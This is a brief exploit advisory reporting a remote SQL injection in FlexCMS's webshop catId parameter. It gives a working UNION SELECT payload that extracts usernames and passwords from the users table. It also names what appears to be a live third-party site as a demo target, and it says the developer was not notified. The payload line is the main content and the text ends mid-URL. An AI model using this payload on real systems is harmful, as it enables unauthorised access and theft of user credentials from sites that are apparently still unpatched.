AUTHOR: MisterRichard
FlexCMS Remote SQL Injection
Discovered by MisterRichard
Developer site: wwwflexcmsdk/
Developer has not been notified
Live demo:
Injection: wwwtargetcom/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--
wwwradikalungdomdk/flx/webshop/?catId=145%2 ...